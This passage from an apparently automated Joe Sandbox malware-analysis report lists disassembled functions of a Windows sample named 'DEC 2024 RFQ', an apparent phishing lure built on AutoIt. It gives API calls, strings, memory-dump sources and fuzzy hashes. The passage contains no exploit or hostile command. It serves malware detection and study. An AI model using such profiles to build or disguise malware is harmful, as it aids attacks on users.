                                                                                                                      • Instruction Fuzzy Hash: 9011E675214208AFEF518FA4CC80EFF37BAEB46368F140125F91497290D6329C5087A0
                                                                                                                      Function 000A6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00021D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00021D73
                                                                                                                        • Part of subcall function 00021D35: GetStockObject.GDI32(00000011), ref: 00021D87
                                                                                                                        • Part of subcall function 00021D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00021D91
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 000A6C71
                                                                                                                      • GetSysColor.USER32(00000012), ref: 000A6C8B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                      • Opcode ID: 68726dc346d994dc9d81f6d9c963bafaef6a0811ac63c4493c29d65d552a5a23
                                                                                                                      • Instruction ID: 8030935e3f183f47b0dd47254410e4b472ed1cbc426bf1bb9d5984c158c93192
                                                                                                                      • Opcode Fuzzy Hash: 68726dc346d994dc9d81f6d9c963bafaef6a0811ac63c4493c29d65d552a5a23
                                                                                                                      • Instruction Fuzzy Hash: B7214472A1021AAFDB04DFF8CC45AFA7BB9FB09314F044628F995E2250D635E8609B60
                                                                                                                      Function 000A6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 000A69A2
                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 000A69B1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                      • String ID: edit
                                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                                      • Opcode ID: d4d53517568f27f6cef93800971e4cf6963aa9037f502ea02ed8f72da944ad86
                                                                                                                      • Instruction ID: b7f736a51f5ed53a709cafa2d9b87073a0c95f7d9b3ed88855f107e2a2189ba6
                                                                                                                      • Opcode Fuzzy Hash: d4d53517568f27f6cef93800971e4cf6963aa9037f502ea02ed8f72da944ad86
                                                                                                                      • Instruction Fuzzy Hash: F9119A71500208ABEB508EB4DC40AFB37BDEB063B8F144728FAA1961E0C736DC519B60
                                                                                                                      Function 000829AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00082A22
                                                                                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00082A41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                      • Opcode ID: 055267806e428c6f0b5a867546ea3aa027cce6352c551cc4e950044be74495ad
                                                                                                                      • Instruction ID: e8c7ce54e026f78ac947d8d34d7497d17b810c9a57631675a30227356c127593
                                                                                                                      • Opcode Fuzzy Hash: 055267806e428c6f0b5a867546ea3aa027cce6352c551cc4e950044be74495ad
                                                                                                                      • Instruction Fuzzy Hash: 2911D036901514ABDB78EA98DD84BAE73E8BF45304F044021E895FB290D770AD0AC792
                                                                                                                      Function 000921D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0009222C
                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00092255
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                      • String ID: <local>
                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                      • Opcode ID: 6809debf6d86c2c9b5686cc0251a744094ec9c22c8eae911a9f692c04306e82d
                                                                                                                      • Instruction ID: 064b37885a989170b8c72bdceba9c1a32c986cfe5a41b99e0732a8199c0dd899
                                                                                                                      • Opcode Fuzzy Hash: 6809debf6d86c2c9b5686cc0251a744094ec9c22c8eae911a9f692c04306e82d
                                                                                                                      • Instruction Fuzzy Hash: 7B11E170541626FADF299F518C88EFBFBACFF16751F10822AFA1586100D3706990E6F0
                                                                                                                      Function 00078E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 0007AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0007AABC
                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00078E73
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                      • Opcode ID: 1e276cf6bfb9afc8459ce921c5be3567fd79244260a4dcc5140944f0b3d72f58
                                                                                                                      • Instruction ID: 57ab85eef9778d2aef193edf6089a3c575dafc09db9f1d21382e1145a0a8ebcc
                                                                                                                      • Opcode Fuzzy Hash: 1e276cf6bfb9afc8459ce921c5be3567fd79244260a4dcc5140944f0b3d72f58
                                                                                                                      • Instruction Fuzzy Hash: 7D01F571B81229AB8B14EBA0CC45CFE7368AF02320B048619F8295B2D2EF355808D764
                                                                                                                      Function 00078CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 0007AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0007AABC
                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00078D6B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                      • Opcode ID: d540a7051a6229ade94a039df22caf2146d4216bc80024e9d9c706bd8897f13a
                                                                                                                      • Instruction ID: c9e8ded35282d396495e3ac95448ac9909d5df5db62e03397fd056469bf15c6f
                                                                                                                      • Opcode Fuzzy Hash: d540a7051a6229ade94a039df22caf2146d4216bc80024e9d9c706bd8897f13a
                                                                                                                      • Instruction Fuzzy Hash: 9F01D471B81119BBDB24EBA0C956EFF77A89F16340F108019B809672D2EE295E08D376
                                                                                                                      Function 00078D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 0007AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0007AABC
                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00078DEE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                      • Opcode ID: c036bed39b4d5d7c75ad3765f1ab2b8468e1c01d6468d749da7d40157fe42397
                                                                                                                      • Instruction ID: 9ce44b6ac286f91935f56c2fc8f61f1c6cf1b8305b4552036e42b3df88498537
                                                                                                                      • Opcode Fuzzy Hash: c036bed39b4d5d7c75ad3765f1ab2b8468e1c01d6468d749da7d40157fe42397
                                                                                                                      • Instruction Fuzzy Hash: EC01F771F81119B7DB25E6A4C946EFF77AC8F12300F108015B80A672D2DE295E08D375
                                                                                                                      Function 0007C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0007C534
                                                                                                                        • Part of subcall function 0007C816: _memmove.LIBCMT ref: 0007C860
                                                                                                                        • Part of subcall function 0007C816: VariantInit.OLEAUT32(00000000), ref: 0007C882
                                                                                                                        • Part of subcall function 0007C816: VariantCopy.OLEAUT32(00000000,?), ref: 0007C88C
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0007C556
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                      • String ID: d}
                                                                                                                      • API String ID: 2932060187-1421853160
                                                                                                                      • Opcode ID: 76d39d96e2123a81c660aa86c7009e1c64777cac404d14500a7df7f6ed7ad887
                                                                                                                      • Instruction ID: 9e028a785d19be6c84c49628993577ba30b059391d2bc89c478ebc48c3bfbf2c
                                                                                                                      • Opcode Fuzzy Hash: 76d39d96e2123a81c660aa86c7009e1c64777cac404d14500a7df7f6ed7ad887
                                                                                                                      • Instruction Fuzzy Hash: D5110C719007099FD710DFAAD88489AF7F8FF18310B50862FE58AD7612E775AA45CBA0
                                                                                                                      Function 00046B71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __calloc_crt
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3494438863-1747426322
                                                                                                                      • Opcode ID: 993b96f5648f7768ee854808a55f96ede8a5648eb83a8c10161f936cfa6c9469
                                                                                                                      • Instruction ID: ac7f0c5aa518a75cc21a79d46fe43d3aea543d9a95970b19218cf0a4f7300605
                                                                                                                      • Opcode Fuzzy Hash: 993b96f5648f7768ee854808a55f96ede8a5648eb83a8c10161f936cfa6c9469
                                                                                                                      • Instruction Fuzzy Hash: 12F044B1608B518BF7649F54FC91BA627D5E702B34B50483EE300DF291FB7988C186D9
                                                                                                                      Function 00084F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName_wcscmp
                                                                                                                      • String ID: #32770
                                                                                                                      • API String ID: 2292705959-463685578
                                                                                                                      • Opcode ID: 197874e52203a4bee5c7ab6a4906b45404b93c6f38a8db099a27bde4f691a004
                                                                                                                      • Instruction ID: 50657f35ed6c79b54907041c515fea924ff0bc9530afd58bd591168aadc6065a
                                                                                                                      • Opcode Fuzzy Hash: 197874e52203a4bee5c7ab6a4906b45404b93c6f38a8db099a27bde4f691a004
                                                                                                                      • Instruction Fuzzy Hash: 31E06833600B292BE320AB99AC49FB7F7ECEB61B70F00002BFD00D7041D9609A4187E0
                                                                                                                      Function 0005B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0005B314: _memset.LIBCMT ref: 0005B321
                                                                                                                        • Part of subcall function 00040940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0005B2F0,?,?,?,0002100A), ref: 00040945
                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0002100A), ref: 0005B2F4
                                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0002100A), ref: 0005B303
                                                                                                                      Strings
                                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0005B2FE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                      • API String ID: 3158253471-631824599
                                                                                                                      • Opcode ID: b1dc433e52d3a8ad976a804d23f57aadb20a8cebe16e3f43b4b6a066d4049ace
                                                                                                                      • Instruction ID: 4279bb682965b04e387e394b654693e8e10c238ff59a03e7de90342435058a87
                                                                                                                      • Opcode Fuzzy Hash: b1dc433e52d3a8ad976a804d23f57aadb20a8cebe16e3f43b4b6a066d4049ace
                                                                                                                      • Instruction Fuzzy Hash: E0E09270200711CFE720DF68E8047477BE8AF00705F008A7CE856EB642E7B8E508CBA1
                                                                                                                      Function 00077C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00077C82
                                                                                                                        • Part of subcall function 00043358: _doexit.LIBCMT ref: 00043362
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message_doexit
                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                      • API String ID: 1993061046-4017498283
                                                                                                                      • Opcode ID: 8cb680f9b554db343c58b1475ace4ff0e3fdbe3a9cdd8963536d3a818d21a77c
                                                                                                                      • Instruction ID: cdbd4aa51195e857b8205718b479dd956aec46b00b3dce60f7f477adf4fa5182
                                                                                                                      • Opcode Fuzzy Hash: 8cb680f9b554db343c58b1475ace4ff0e3fdbe3a9cdd8963536d3a818d21a77c
                                                                                                                      • Instruction Fuzzy Hash: 91D05B323C831836D11532A57D07FDA79884F05B52F044476FB0C9D5D349E5459041FD
                                                                                                                      Function 00061935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00061775
                                                                                                                        • Part of subcall function 0009BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0006195E,?), ref: 0009BFFE
                                                                                                                        • Part of subcall function 0009BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0009C010
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0006196D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                      • String ID: WIN_XPe
                                                                                                                      • API String ID: 582185067-3257408948
                                                                                                                      • Opcode ID: 654aeae33d2934931fea41624fbaf8b0b924e893a04ba43af2ac59083ce1273c
                                                                                                                      • Instruction ID: 8438e6d2126770c5e0960d0e267536c8d2c003a0e68e0b468653256337f2d5bc
                                                                                                                      • Opcode Fuzzy Hash: 654aeae33d2934931fea41624fbaf8b0b924e893a04ba43af2ac59083ce1273c
                                                                                                                      • Instruction Fuzzy Hash: 5DF0C971804109DFEB65DB91D998AECBBF9AB18301F580095E102A60A1D7755F84DF60
                                                                                                                      Function 000A5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000A596E
                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 000A5981
                                                                                                                        • Part of subcall function 00085244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000852BC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: 5adbe87c77198992df0b7ee2be754416990c446f35c8ca019d98bb6634811255
                                                                                                                      • Instruction ID: 9f5da3c545fd5fa98a0289c0a1a761937b3246fbb904fe8369e8c9f08bddf840
                                                                                                                      • Opcode Fuzzy Hash: 5adbe87c77198992df0b7ee2be754416990c446f35c8ca019d98bb6634811255
                                                                                                                      • Instruction Fuzzy Hash: 29D0C935784B12B6E664BBB0AC4FFE66A54BB01B51F000825B349AA1D5C9E49800C764
                                                                                                                      Function 000A5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000A59AE
                                                                                                                      • PostMessageW.USER32(00000000), ref: 000A59B5
                                                                                                                        • Part of subcall function 00085244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000852BC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
